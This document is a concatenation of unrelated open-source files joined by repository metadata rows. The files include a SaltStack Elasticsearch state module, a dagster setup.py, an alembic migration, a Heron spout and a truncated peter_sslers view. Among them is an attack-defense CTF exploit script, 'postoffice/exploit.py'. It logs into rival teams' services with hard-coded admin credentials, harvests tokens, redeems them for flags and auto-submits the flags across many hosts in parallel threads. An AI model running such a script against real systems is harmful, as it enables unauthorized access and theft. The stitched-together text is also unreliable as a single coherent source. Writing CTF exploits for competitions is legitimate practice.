            ret['result'] = None
            ret['comment'] = 'Alias {0} for index {1} will be removed'.format(name, index)
            ret['changes']['old'] = old
            return ret

        ret['result'] = __salt__['elasticsearch.alias_delete'](aliases=name, indices=index)
        if ret['result']:
            ret['comment'] = 'Successfully removed alias {0} for index {1}'.format(name, index)
            ret['changes']['old'] = old
        else:
            ret['comment'] = 'Failed to remove alias {0} for index {1} for unknown reasons'.format(name, index)
    except Exception as err:
        ret['result'] = False
        ret['comment'] = six.text_type(err)

    return ret
def alias_present(name, index, definition=None):
    '''
    Ensure that the named index alias is present.

    name
        Name of the alias

    index
        Name of the index

    definition
        Optional dict for filters as per https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-aliases.html

    **Example:**

    .. code-block:: yaml

        mytestalias:
          elasticsearch.alias_present:
            - index: testindex
            - definition:
                filter:
                  term:
                    user: kimchy
    '''
    ret = {'name': name, 'changes': {}, 'result': True, 'comment': ''}
    try:
        alias = __salt__['elasticsearch.alias_get'](aliases=name, indices=index)
        # The existing alias body for this (index, name) pair, if any.
        old = {}
        if alias:
            old = alias.get(index, {}).get("aliases", {}).get(name, {})
        if not definition:
            definition = {}
        ret['changes'] = __utils__['dictdiffer.deep_diff'](old, definition)
        # Note: an empty definition always takes the (re)create branch,
        # even when no diff was found - presumably to guarantee the alias
        # exists; confirm before changing.
        if ret['changes'] or not definition:
            if __opts__['test']:
                if not old:
                    ret['comment'] = 'Alias {0} for index {1} does not exist and will be created'.format(name, index)
                else:
                    ret['comment'] = 'Alias {0} for index {1} exists with wrong configuration and will be overridden'.format(name, index)
                ret['result'] = None
            else:
                # alias_create both creates and replaces the alias.
                output = __salt__['elasticsearch.alias_create'](alias=name, indices=index, body=definition)
                if output:
                    if not old:
                        ret['comment'] = 'Successfully created alias {0} for index {1}'.format(name, index)
                    else:
                        ret['comment'] = 'Successfully replaced alias {0} for index {1}'.format(name, index)
                else:
                    ret['result'] = False
                    ret['comment'] = 'Cannot create alias {0} for index {1}, {2}'.format(name, index, output)
        else:
            ret['comment'] = 'Alias {0} for index {1} is already present'.format(name, index)
    except Exception as err:
        ret['result'] = False
        ret['comment'] = six.text_type(err)
    return ret
def index_template_absent(name):
    '''
    Ensure that the named index template is absent.

    name
        Name of the index to remove
    '''
    ret = {'name': name, 'changes': {}, 'result': True, 'comment': ''}

    try:
        existing = __salt__['elasticsearch.index_template_get'](name=name)

        # Nothing to do if the template does not exist.
        if not existing or name not in existing:
            ret['comment'] = 'Index template {0} is already absent'.format(name)
            return ret

        # Test mode: report what would happen, change nothing.
        if __opts__['test']:
            ret['result'] = None
            ret['comment'] = 'Index template {0} will be removed'.format(name)
            ret['changes']['old'] = existing[name]
            return ret

        ret['result'] = __salt__['elasticsearch.index_template_delete'](name=name)
        if ret['result']:
            ret['comment'] = 'Successfully removed index template {0}'.format(name)
            ret['changes']['old'] = existing[name]
        else:
            ret['comment'] = 'Failed to remove index template {0} for unknown reasons'.format(name)
    except Exception as err:
        ret['result'] = False
        ret['comment'] = six.text_type(err)

    return ret
def index_template_present(name, definition, check_definition=False):
    '''
    Ensure that the named index template is present.

    name
        Name of the index to add

    definition
        Required dict for creation parameters as per https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-templates.html

    check_definition
        If the template already exists and the definition is up to date

    **Example:**

    .. code-block:: yaml

        mytestindex2_template:
          elasticsearch.index_template_present:
            - definition:
                template: logstash-*
                order: 1
                settings:
                  number_of_shards: 1
    '''
    ret = {'name': name, 'changes': {}, 'result': True, 'comment': ''}
    try:
        index_template_exists = __salt__['elasticsearch.index_template_exists'](name=name)
        if not index_template_exists:
            if __opts__['test']:
                ret['comment'] = 'Index template {0} does not exist and will be created'.format(name)
                ret['changes'] = {'new': definition}
                ret['result'] = None
            else:
                output = __salt__['elasticsearch.index_template_create'](name=name, body=definition)
                if output:
                    ret['comment'] = 'Successfully created index template {0}'.format(name)
                    ret['changes'] = {'new': __salt__['elasticsearch.index_template_get'](name=name)[name]}
                else:
                    ret['result'] = False
                    ret['comment'] = 'Cannot create index template {0}, {1}'.format(name, output)
        else:
            if check_definition:
                # Fix: use six.string_types so a unicode definition (the
                # normal case under Python 2 with unicode_literals) is
                # parsed instead of being diffed as a raw string.
                if isinstance(definition, six.string_types):
                    definition_parsed = salt.utils.json.loads(definition)
                else:
                    definition_parsed = definition
                current_template = __salt__['elasticsearch.index_template_get'](name=name)[name]
                # Prune empty keys (avoid false positive diff)
                for key in ("mappings", "aliases", "settings"):
                    if current_template[key] == {}:
                        del current_template[key]
                diff = __utils__['dictdiffer.deep_diff'](current_template, definition_parsed)
                if diff:
                    if __opts__['test']:
                        ret['comment'] = 'Index template {0} exist but need to be updated'.format(name)
                        ret['changes'] = diff
                        ret['result'] = None
                    else:
                        output = __salt__['elasticsearch.index_template_create'](name=name, body=definition)
                        if output:
                            ret['comment'] = 'Successfully updated index template {0}'.format(name)
                            ret['changes'] = diff
                        else:
                            ret['result'] = False
                            ret['comment'] = 'Cannot update index template {0}, {1}'.format(name, output)
                else:
                    ret['comment'] = 'Index template {0} is already present and up to date'.format(name)
            else:
                ret['comment'] = 'Index template {0} is already present'.format(name)
    except Exception as err:
        ret['result'] = False
        ret['comment'] = six.text_type(err)
    return ret
def pipeline_absent(name):
    '''
    Ensure that the named pipeline is absent

    name
        Name of the pipeline to remove
    '''
    ret = {'name': name, 'changes': {}, 'result': True, 'comment': ''}
    try:
        existing = __salt__['elasticsearch.pipeline_get'](id=name)
        if not (existing and name in existing):
            # Desired state already holds; nothing to change.
            ret['comment'] = 'Pipeline {0} is already absent'.format(name)
            return ret
        if __opts__['test']:
            # Dry run: report the pending removal without touching the cluster.
            ret['comment'] = 'Pipeline {0} will be removed'.format(name)
            ret['changes']['old'] = existing[name]
            ret['result'] = None
            return ret
        ret['result'] = __salt__['elasticsearch.pipeline_delete'](id=name)
        if ret['result']:
            ret['comment'] = 'Successfully removed pipeline {0}'.format(name)
            ret['changes']['old'] = existing[name]
        else:
            ret['comment'] = 'Failed to remove pipeline {0} for unknown reasons'.format(name)
    except Exception as err:
        # Any API/transport error is surfaced as a failed state.
        ret['result'] = False
        ret['comment'] = six.text_type(err)
    return ret
def pipeline_present(name, definition):
    '''
    Ensure that the named pipeline is present.

    name
        Name of the index to add
    definition
        Required dict for creation parameters as per https://www.elastic.co/guide/en/elasticsearch/reference/master/pipeline.html

    **Example:**

    .. code-block:: yaml

        test_pipeline:
          elasticsearch.pipeline_present:
            - definition:
                description: example pipeline
                processors:
                  - set:
                      field: collector_timestamp_millis
                      value: '{{ '{{' }}_ingest.timestamp{{ '}}' }}'
    '''
    ret = {'name': name, 'changes': {}, 'result': True, 'comment': ''}
    try:
        existing = __salt__['elasticsearch.pipeline_get'](id=name)
        previous = existing[name] if existing and name in existing else {}
        # The deep diff against the desired definition doubles as the
        # changes dict reported back to the user.
        ret['changes'] = __utils__['dictdiffer.deep_diff'](previous, definition)
        if not ret['changes'] and definition:
            ret['comment'] = 'Pipeline {0} is already present'.format(name)
            return ret
        if __opts__['test']:
            # Dry run: only report what would be created/overridden.
            if not existing:
                ret['comment'] = 'Pipeline {0} does not exist and will be created'.format(name)
            else:
                ret['comment'] = 'Pipeline {0} exists with wrong configuration and will be overridden'.format(name)
            ret['result'] = None
            return ret
        output = __salt__['elasticsearch.pipeline_create'](id=name, body=definition)
        if output:
            if not existing:
                ret['comment'] = 'Successfully created pipeline {0}'.format(name)
            else:
                ret['comment'] = 'Successfully replaced pipeline {0}'.format(name)
        else:
            ret['result'] = False
            ret['comment'] = 'Cannot create pipeline {0}, {1}'.format(name, output)
    except Exception as err:
        ret['result'] = False
        ret['comment'] = six.text_type(err)
    return ret
def search_template_absent(name):
    '''
    Ensure that the search template is absent

    name
        Name of the search template to remove
    '''
    ret = {'name': name, 'changes': {}, 'result': True, 'comment': ''}
    try:
        existing = __salt__['elasticsearch.search_template_get'](id=name)
        if not existing:
            # Desired state already holds; nothing to change.
            ret['comment'] = 'Search template {0} is already absent'.format(name)
            return ret
        if __opts__['test']:
            # Dry run: report the pending removal without touching the cluster.
            ret['comment'] = 'Search template {0} will be removed'.format(name)
            ret['changes']['old'] = salt.utils.json.loads(existing["template"])
            ret['result'] = None
            return ret
        ret['result'] = __salt__['elasticsearch.search_template_delete'](id=name)
        if ret['result']:
            ret['comment'] = 'Successfully removed search template {0}'.format(name)
            ret['changes']['old'] = salt.utils.json.loads(existing["template"])
        else:
            ret['comment'] = 'Failed to remove search template {0} for unknown reasons'.format(name)
    except Exception as err:
        # Any API/transport error is surfaced as a failed state.
        ret['result'] = False
        ret['comment'] = six.text_type(err)
    return ret
def search_template_present(name, definition):
    '''
    Ensure that the named search template is present.

    name
        Name of the search template to add
    definition
        Required dict for creation parameters as per http://www.elastic.co/guide/en/elasticsearch/reference/current/search-template.html

    **Example:**

    .. code-block:: yaml

        test_pipeline:
          elasticsearch.search_template_present:
            - definition:
                inline:
                  size: 10
    '''
    ret = {'name': name, 'changes': {}, 'result': True, 'comment': ''}
    try:
        existing = __salt__['elasticsearch.search_template_get'](id=name)
        # The stored template body is a JSON string; decode before diffing.
        previous = salt.utils.json.loads(existing["template"]) if existing else {}
        ret['changes'] = __utils__['dictdiffer.deep_diff'](previous, definition)
        if not ret['changes'] and definition:
            ret['comment'] = 'Search template {0} is already present'.format(name)
            return ret
        if __opts__['test']:
            # Dry run: only report what would be created/overridden.
            if not existing:
                ret['comment'] = 'Search template {0} does not exist and will be created'.format(name)
            else:
                ret['comment'] = 'Search template {0} exists with wrong configuration and will be overridden'.format(name)
            ret['result'] = None
            return ret
        output = __salt__['elasticsearch.search_template_create'](id=name, body=definition)
        if output:
            if not existing:
                ret['comment'] = 'Successfully created search template {0}'.format(name)
            else:
                ret['comment'] = 'Successfully replaced search template {0}'.format(name)
        else:
            ret['result'] = False
            ret['comment'] = 'Cannot create search template {0}, {1}'.format(name, output)
    except Exception as err:
        ret['result'] = False
        ret['comment'] = six.text_type(err)
    return ret
| 36.476673 | 142 | 0.54368 |
acfa7d067bbb9209be5c6f9152c46afb2538ccde | 2,612 | py | Python | AD-INCTF-SECCON/postoffice/exploit.py | UnknownAbyss/CTF-Write-ups | 5e9812afefaad7cfd823c0a52c9679d88d4b9508 | [
"MIT"
] | 73 | 2020-06-14T03:25:45.000Z | 2022-03-30T10:22:08.000Z | AD-INCTF-SECCON/postoffice/exploit.py | UnknownAbyss/CTF-Write-ups | 5e9812afefaad7cfd823c0a52c9679d88d4b9508 | [
"MIT"
] | 6 | 2020-06-18T17:17:36.000Z | 2021-10-04T09:38:12.000Z | AD-INCTF-SECCON/postoffice/exploit.py | UnknownAbyss/CTF-Write-ups | 5e9812afefaad7cfd823c0a52c9679d88d4b9508 | [
"MIT"
] | 30 | 2020-06-11T17:29:56.000Z | 2022-03-14T00:39:31.000Z | from pwn import *
from utilities import extract_flag, submit_flag
import json
import threading
port = 8080
def random_string(l):
    """Return a random string of ``l`` ASCII letters (mixed case)."""
    alphabet = string.ascii_letters
    return ''.join(random.choice(alphabet) for _ in range(l))
def register(username, email, password, host):
    """Create an account on the target service via its interactive menu.

    Sends menu option '1' (presumably the "register" choice -- confirm
    against the service banner), then answers the username/email/password
    prompts in order.
    """
    r = remote(host, port, level='error')
    r.sendline('1')
    print(r.recvuntil('Username: ').decode())
    r.sendline(username)
    print(r.recvuntil('Email: ').decode())
    r.sendline(email)
    # NOTE: this prompt has no trailing space ('Password:'), unlike the others.
    print(r.recvuntil('Password:').decode())
    r.sendline(password)
    r.close()
def admin_stuff(host):
    """Log in with the hard-coded admin credentials and return the output
    lines printed after login (one token per line).
    """
    r = remote(host, port, level='error')
    print('\n\n DOING ADMIN STUFF \n\n')
    print(r.recvuntil('Your choice(1-2): ').decode())
    r.sendline('2')
    print(r.recvuntil('Email: ').decode())
    r.sendline('admin@gmail.com')
    print(r.recvuntil('Password: ').decode())
    r.sendline('adminpassword')
    # Drop the first two lines of the post-login output; the remainder is
    # the token list. NOTE(review): connection is never closed here.
    x = r.recvall().decode().strip().split('\n')[2:]
    return x
def exploit(email, password, token, host):
    """Log in as our own account, redeem ``token`` via menu option 2, and
    return the flags extracted from the full session output.

    Returns the list produced by extract_flag(); callers index [0], so an
    empty match raises IndexError (caught upstream in exploit_team).
    """
    r = remote(host, port, level='error')
    print('\n\n DOING EXPLOIT \n\n')
    r.recvuntil('Your choice(1-2): ').decode()
    r.sendline('2')
    r.recvuntil('Email: ').decode()
    r.sendline(email)
    r.recvuntil('Password: ').decode()
    r.sendline(password)
    r.recvuntil('Your choice(1-3): ').decode()
    r.sendline('2')
    r.sendline(token)
    text = r.recvall().decode()
    flags = extract_flag(text)
    r.close()
    print(f'GOT FLAG {flags[0]}\n\n\n')
    print(host)
    return flags
# Shared mutable state for the worker threads below: `teams` is the work
# queue (popped concurrently), `used_tokens` caches per-host tokens already
# redeemed so re-runs skip duplicates.
teams = json.load(open('teamlist.json'))
used_tokens = {}
def exploit_team():
    """Worker loop: pop teams off the shared ``teams`` list and run the full
    exploit chain (register -> admin token dump -> redeem) against each one.

    Exits when the shared list is exhausted; any per-team failure is logged
    and the worker moves on to the next team.
    """
    while True:
        # BUGFIX: the original `if len(teams) == 0: return / else: teams.pop()`
        # is racy with 10 workers sharing the list -- another thread can pop
        # between the length check and the pop, raising an uncaught
        # IndexError. A bare pop() guarded by IndexError is atomic under
        # the GIL.
        try:
            team = teams.pop()
        except IndexError:
            return
        try:
            host = team['ip']
            username = random_string(10)
            email = username + '@gmail.com'
            password = random_string(10)
            register(username, email, password, host)
            tokens = admin_stuff(host)
            # Only redeem tokens we have not seen for this host before.
            if not used_tokens.get(team['ip']):
                used_tokens[team['ip']] = {}
            for token in tokens:
                if token not in used_tokens[team['ip']]:
                    used_tokens[team['ip']][token] = exploit(email, password, token, host)[0]
            print(f'\n\n\n\n\n\nSUBMITTING FOR TEAM {team}\n\n\n\n\n\n')
            submit_flag(list(used_tokens[team['ip']].values()))
        except Exception:
            # Best effort: one unreachable/broken team must not kill the worker.
            print(f'Failed for {team["name"]}')
# Fan out: start 10 worker threads over the shared `teams` queue, then block
# until every worker has drained it and returned.
jobs = []
for i in range(10):
    x = threading.Thread(target=exploit_team)
    jobs.append(x)
    x.start()
for job in jobs:
    job.join()
| 20.730159 | 93 | 0.57925 |
acfa7d3d15df49956be0f5422eb5072b7c034fe7 | 184 | py | Python | test_data/parse/unexpected/class_definitions/unexpected_docstring_before_a_method/meta_model.py | gillistephan/aas-core-codegen | 5b89ea2ee35aecaca9a1bed7ac81d420cc560f29 | [
"MIT"
] | 5 | 2021-12-29T12:55:34.000Z | 2022-03-01T17:57:21.000Z | test_data/parse/unexpected/class_definitions/unexpected_docstring_before_a_method/meta_model.py | gillistephan/aas-core-codegen | 5b89ea2ee35aecaca9a1bed7ac81d420cc560f29 | [
"MIT"
] | 10 | 2021-12-29T02:15:55.000Z | 2022-03-09T11:04:22.000Z | test_data/parse/unexpected/class_definitions/unexpected_docstring_before_a_method/meta_model.py | gillistephan/aas-core-codegen | 5b89ea2ee35aecaca9a1bed7ac81d420cc560f29 | [
"MIT"
] | 2 | 2021-12-29T01:42:12.000Z | 2022-02-15T13:46:33.000Z | class Something:
"""Represent something."""
"""unexpected description"""
def do_something(self) -> None:
pass
__book_url__ = "dummy"
__book_version__ = "dummy"
| 15.333333 | 35 | 0.641304 |
acfa7dd513ecb01a2cbdc0550eabb4372013d461 | 1,852 | py | Python | python_modules/libraries/dagster-aws/setup.py | shahvineet98/dagster | 2471d39c52f660e23e8c0d8e8ded873ddc3df036 | [
"Apache-2.0"
] | 1 | 2019-11-25T19:03:32.000Z | 2019-11-25T19:03:32.000Z | python_modules/libraries/dagster-aws/setup.py | shahvineet98/dagster | 2471d39c52f660e23e8c0d8e8ded873ddc3df036 | [
"Apache-2.0"
] | null | null | null | python_modules/libraries/dagster-aws/setup.py | shahvineet98/dagster | 2471d39c52f660e23e8c0d8e8ded873ddc3df036 | [
"Apache-2.0"
] | null | null | null | import argparse
import sys
from setuptools import find_packages, setup
def get_version(name):
    """Read the distribution version out of dagster_aws/version.py.

    'dagster-aws' maps to __version__, 'dagster-aws-nightly' to __nightly__;
    any other name is a programming error.
    """
    version = {}
    with open('dagster_aws/version.py') as fp:
        exec(fp.read(), version)  # pylint: disable=W0122

    if name == 'dagster-aws':
        return version['__version__']
    if name == 'dagster-aws-nightly':
        return version['__nightly__']
    raise Exception('Shouldn\'t be here: bad package name {name}'.format(name=name))
# CLI flag: `--nightly` switches the build to the nightly package name/version
# (consumed in the __main__ guard below).
parser = argparse.ArgumentParser()
parser.add_argument('--nightly', action='store_true')
def _do_setup(name='dagster-aws'):
    """Invoke setuptools.setup() for the given distribution name.

    ``name`` selects which version string get_version() reads:
    'dagster-aws' (regular release) or 'dagster-aws-nightly'.
    """
    setup(
        name='dagster_aws',
        version=get_version(name),
        author='Elementl',
        license='Apache-2.0',
        description='Package for AWS-specific Dagster framework solid and resource components.',
        url='https://github.com/dagster-io/dagster/tree/master/python_modules/libraries/dagster-aws',
        classifiers=[
            'Programming Language :: Python :: 2.7',
            'Programming Language :: Python :: 3.5',
            'Programming Language :: Python :: 3.6',
            'License :: OSI Approved :: Apache Software License',
            'Operating System :: OS Independent',
        ],
        packages=find_packages(exclude=['test']),
        include_package_data=True,
        install_requires=['boto3==1.9.*', 'dagster', 'requests', 'terminaltables'],
        tests_require=['moto==1.3.*'],
        # backports.tempfile is only needed on Python 2.
        extras_require={':python_version<"3"': ['backports.tempfile']},
        entry_points={'console_scripts': ['dagster-aws = dagster_aws.cli.cli:main']},
        zip_safe=False,
    )
if __name__ == '__main__':
    # Consume `--nightly` here; everything else in argv is handed through
    # to setuptools unchanged.
    parsed, unparsed = parser.parse_known_args()
    sys.argv = [sys.argv[0]] + unparsed
    if parsed.nightly:
        _do_setup('dagster-aws-nightly')
    else:
        _do_setup('dagster-aws')
| 33.071429 | 101 | 0.62959 |
acfa7e1e26f7cc7f4ef22d4f028db73112f59ddb | 1,967 | py | Python | alembic/versions/f59c3dad9acd_report_and_meta_tables_initial_creation.py | fedus/py_reportit | 46422cabb652571d8cce6c8e91a229009dcca141 | [
"MIT"
] | 1 | 2021-12-05T19:16:16.000Z | 2021-12-05T19:16:16.000Z | alembic/versions/f59c3dad9acd_report_and_meta_tables_initial_creation.py | fedus/py_reportit | 46422cabb652571d8cce6c8e91a229009dcca141 | [
"MIT"
] | null | null | null | alembic/versions/f59c3dad9acd_report_and_meta_tables_initial_creation.py | fedus/py_reportit | 46422cabb652571d8cce6c8e91a229009dcca141 | [
"MIT"
] | null | null | null | """Report and Meta tables - initial creation
Revision ID: f59c3dad9acd
Revises:
Create Date: 2021-08-12 18:08:50.873779
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'f59c3dad9acd'
down_revision = None  # first migration in this chain
branch_labels = None
depends_on = None
def upgrade():
    """Create the ``report`` table and its dependent ``meta`` table."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('report',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('title', sa.Unicode(length=255), nullable=True),
    sa.Column('description', sa.UnicodeText(), nullable=True),
    sa.Column('photo_url', sa.String(length=100), nullable=True),
    sa.Column('thumbnail_url', sa.String(length=100), nullable=True),
    # precision/scale chosen for lat (-90..90) / lon (-180..180) coordinates
    sa.Column('latitude', sa.Numeric(precision=8, scale=6), nullable=True),
    sa.Column('longitude', sa.Numeric(precision=9, scale=6), nullable=True),
    sa.Column('created_at', sa.DateTime(), nullable=True),
    sa.Column('updated_at', sa.DateTime(), nullable=True),
    sa.Column('key_category', sa.String(length=100), nullable=True),
    sa.Column('id_service', sa.SmallInteger(), nullable=True),
    sa.Column('status', sa.Unicode(length=50), nullable=True),
    sa.PrimaryKeyConstraint('id')
    )
    # meta rows track per-report processing state and reference report.id
    op.create_table('meta',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('report_id', sa.Integer(), nullable=False),
    sa.Column('tweeted', sa.Boolean(), server_default=sa.text('false'), nullable=False),
    sa.Column('photo_downloaded', sa.Boolean(), server_default=sa.text('false'), nullable=False),
    sa.Column('thumb_downloaded', sa.Boolean(), server_default=sa.text('false'), nullable=False),
    sa.ForeignKeyConstraint(['report_id'], ['report.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    # ### end Alembic commands ###
def downgrade():
    """Drop both tables, child first (``meta`` references ``report.id``)."""
    for table_name in ('meta', 'report'):
        op.drop_table(table_name)
| 37.113208 | 97 | 0.684291 |
acfa7e61716d2561d31430e3ad430fa99d9afcdd | 909 | py | Python | src/cursesAPI.py | KapJI/PathPicker | 3d285f8de9eb43970ae14e0623168b248fbaad6f | [
"MIT"
] | null | null | null | src/cursesAPI.py | KapJI/PathPicker | 3d285f8de9eb43970ae14e0623168b248fbaad6f | [
"MIT"
] | null | null | null | src/cursesAPI.py | KapJI/PathPicker | 3d285f8de9eb43970ae14e0623168b248fbaad6f | [
"MIT"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import print_function
import curses
import sys
class CursesAPI(object):
    """Thin pass-through wrapper around the ``curses`` module.

    Exists purely as an indirection point so a test environment can swap in
    a fake implementation and intercept these calls."""

    def __init__(self):
        pass

    # --- echo control ---------------------------------------------------
    def echo(self):
        curses.echo()

    def noecho(self):
        curses.noecho()

    # --- colors ---------------------------------------------------------
    def useDefaultColors(self):
        curses.use_default_colors()

    def initPair(self, pairNumber, fg, bg):
        return curses.init_pair(pairNumber, fg, bg)

    def colorPair(self, colorNumber):
        return curses.color_pair(colorNumber)

    def getColorPairs(self):
        return curses.COLOR_PAIRS

    # --- process / environment ------------------------------------------
    def exit(self):
        sys.exit(0)

    def allowFileOutput(self):
        # Always permitted in the real curses environment.
        return True
| 21.642857 | 65 | 0.674367 |
acfa7ff38a6d76b480413cffe8ff56bdce93deb6 | 581 | py | Python | stable_nalu/functional/regualizer_nmu_z.py | wlm2019/Neural-Arithmetic-Units | f9de9d004bb2dc2ee28577cd1760d0a00c185836 | [
"MIT"
] | 147 | 2019-10-07T11:01:54.000Z | 2021-11-16T02:51:18.000Z | stable_nalu/functional/regualizer_nmu_z.py | wlm2019/Neural-Arithmetic-Units | f9de9d004bb2dc2ee28577cd1760d0a00c185836 | [
"MIT"
] | 1 | 2019-12-03T12:40:21.000Z | 2019-12-03T12:40:21.000Z | stable_nalu/functional/regualizer_nmu_z.py | wlm2019/Neural-Arithmetic-Units | f9de9d004bb2dc2ee28577cd1760d0a00c185836 | [
"MIT"
] | 19 | 2019-12-21T15:58:44.000Z | 2021-09-03T08:32:38.000Z |
import torch
class RegualizerNMUZ:
def __init__(self, zero=False):
self.zero = zero
self.stored_inputs = []
def __call__(self, W):
if self.zero:
return 0
x_mean = torch.mean(
torch.cat(self.stored_inputs, dim=0),
dim=0, keepdim=True
)
return torch.mean((1 - W) * (1 - x_mean)**2)
def append_input(self, x):
if self.zero:
return
self.stored_inputs.append(x)
def reset(self):
if self.zero:
return
self.stored_inputs = []
| 20.75 | 52 | 0.524957 |
acfa82fc4b5056789cbcd3ae176a0cf24463bf04 | 1,901 | py | Python | heron/spouts/src/python/fixedlines/fixedlinesspout.py | zhengyangtean/CG4001_Heron_ElasticBolt | e471593c265088996d485e2dd11c9f2484876568 | [
"Apache-2.0"
] | 1 | 2017-11-06T08:23:43.000Z | 2017-11-06T08:23:43.000Z | heron/spouts/src/python/fixedlines/fixedlinesspout.py | zhengyangtean/CG4001_Heron_ElasticBolt | e471593c265088996d485e2dd11c9f2484876568 | [
"Apache-2.0"
] | null | null | null | heron/spouts/src/python/fixedlines/fixedlinesspout.py | zhengyangtean/CG4001_Heron_ElasticBolt | e471593c265088996d485e2dd11c9f2484876568 | [
"Apache-2.0"
] | null | null | null | # Copyright 2016 - Twitter, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''fixedlinesspout.py: module that implements a very simple Spout that emits
a bunch of fixed lines'''
from heron.api.src.python import Spout, Stream
class FixedLinesSpout(Spout):
    """Spout that cycles forever through a fixed set of sentences,
    emitting one line per tuple on the 'output' stream."""
    outputs = [Stream(fields=['_output_'], name='output')]

    # pylint: disable=unused-argument
    def initialize(self, config, context):
        """Set up the static line list and the emit/ack/fail counters."""
        self.logger.info("Initializing FixedLinesSpout with the following")
        self.logger.info("Component-specific config: \n%s" % str(config))
        self.words = ["Mary had a little lamb",
                      "Humpy Dumpy sat on a wall",
                      "Here we round the Moulberry bush"]
        self.index = 0
        self.emit_count = 0
        self.ack_count = 0
        self.fail_count = 0

    def _get_next_line(self):
        """Return the current line and advance the cursor, wrapping around."""
        line = self.words[self.index]
        self.index = (self.index + 1) % len(self.words)
        return line

    def next_tuple(self):
        """Emit the next fixed line on the 'output' stream."""
        self.emit([self._get_next_line()], stream='output')
        self.emit_count += 1

    def ack(self, tup_id):
        """Count and log a successfully processed tuple."""
        self.ack_count += 1
        self.logger.debug("Acked tuple %s" % str(tup_id))

    def fail(self, tup_id):
        """Count and log a failed tuple."""
        self.fail_count += 1
        self.logger.debug("Failed tuple %s" % str(tup_id))
| 34.563636 | 81 | 0.692793 |
acfa83b50ccdf65f53c92f5b0ddbea8370121921 | 2,169 | py | Python | src/ear.py | LanskovNV/triangulate | 497111f37e3c5a28e2c52dfcd41d78b6e62c5593 | [
"MIT"
] | null | null | null | src/ear.py | LanskovNV/triangulate | 497111f37e3c5a28e2c52dfcd41d78b6e62c5593 | [
"MIT"
] | null | null | null | src/ear.py | LanskovNV/triangulate | 497111f37e3c5a28e2c52dfcd41d78b6e62c5593 | [
"MIT"
] | null | null | null | class Ear:
index = 0
prew = 0
next = 0
coords = []
neighbour_coords = []
def __init__(self, points, indexes, ind):
self.index = ind
self.coords = points[ind]
length = len(indexes)
index_in_indexes_arr = indexes.index(ind)
self.next = indexes[(index_in_indexes_arr + 1) % length]
if index_in_indexes_arr == 0:
self.prew = indexes[length - 1]
else:
self.prew = indexes[index_in_indexes_arr - 1]
self.neighbour_coords = [
points[self.prew],
points[self.next]
]
def is_inside(self, point):
p1 = self.coords
p2 = self.neighbour_coords[0]
p3 = self.neighbour_coords[1]
p0 = point
d = [
(p1[0] - p0[0]) * (p2[1] - p1[1]) - (p2[0] - p1[0]) * (p1[1] - p0[1]),
(p2[0] - p0[0]) * (p3[1] - p2[1]) - (p3[0] - p2[0]) * (p2[1] - p0[1]),
(p3[0] - p0[0]) * (p1[1] - p3[1]) - (p1[0] - p3[0]) * (p3[1] - p0[1])
]
if d[0] * d[1] >= 0 and d[2] * d[1] >= 0 and d[0] * d[2] >= 0:
return True
return False
def is_ear_point(self, p):
if p == self.coords or p in self.neighbour_coords:
return True
return False
def validate(self, points, indexes, ears):
not_ear_points = []
for i in indexes:
if points[i] != self.coords and points[i] not in self.neighbour_coords:
not_ear_points.append(points[i])
insides = [self.is_inside(p) for p in not_ear_points]
if self.is_convex() and True not in insides:
for e in ears:
if e.is_ear_point(self.coords):
return False
return True
return False
def is_convex(self):
a = self.neighbour_coords[0]
b = self.coords
c = self.neighbour_coords[1]
ab = [b[0] - a[0], b[1] - a[1]]
bc = [c[0] - b[0], c[1] - b[1]]
if ab[0] * bc[1] - ab[1] * bc[0] <= 0:
return False
return True
def get_triangle(self):
return [self.prew, self.index, self.next]
| 30.985714 | 83 | 0.49562 |
acfa83f2e08be68f4c455ea0a693968b26b6ef9d | 61,598 | py | Python | src/peter_sslers/web/views_admin/acme_account.py | jvanasco/pyramid_letsencrypt_admin | 6db37d30ef8028ff978bf6083cdf978fc88a4782 | [
"MIT"
] | null | null | null | src/peter_sslers/web/views_admin/acme_account.py | jvanasco/pyramid_letsencrypt_admin | 6db37d30ef8028ff978bf6083cdf978fc88a4782 | [
"MIT"
] | null | null | null | src/peter_sslers/web/views_admin/acme_account.py | jvanasco/pyramid_letsencrypt_admin | 6db37d30ef8028ff978bf6083cdf978fc88a4782 | [
"MIT"
] | null | null | null | # pypi
from pyramid.httpexceptions import HTTPNotFound
from pyramid.httpexceptions import HTTPSeeOther
from pyramid.renderers import render_to_response
from pyramid.view import view_config
# local
from ..lib import formhandling
from ..lib.docs import docify
from ..lib.docs import formatted_get_docs
from ..lib.form_utils import AcmeAccountUploadParser
from ..lib.forms import Form_AcmeAccount_deactivate
from ..lib.forms import Form_AcmeAccount_deactivate_authorizations
from ..lib.forms import Form_AcmeAccount_edit
from ..lib.forms import Form_AcmeAccount_key_change
from ..lib.forms import Form_AcmeAccount_mark
from ..lib.forms import Form_AcmeAccount_new__auth
from ..lib.forms import Form_AcmeAccount_new__file
from ..lib.handler import Handler
from ..lib.handler import items_per_page
from ..lib.handler import json_pagination
from ...lib import cert_utils
from ...lib import db as lib_db
from ...lib import errors
from ...lib import utils
from ...lib._compat import quote_plus
from ...model import utils as model_utils
# ==============================================================================
class View_List(Handler):
    """Paginated listing of AcmeAccount records (HTML and JSON variants)."""

    @view_config(route_name="admin:acme_accounts", renderer="/admin/acme_accounts.mako")
    @view_config(
        route_name="admin:acme_accounts_paginated",
        renderer="/admin/acme_accounts.mako",
    )
    @view_config(route_name="admin:acme_accounts|json", renderer="json")
    @view_config(route_name="admin:acme_accounts_paginated|json", renderer="json")
    @docify(
        {
            "endpoint": "/acme-accounts.json",
            "section": "acme-account",
            "about": """list AcmeAccount(s)""",
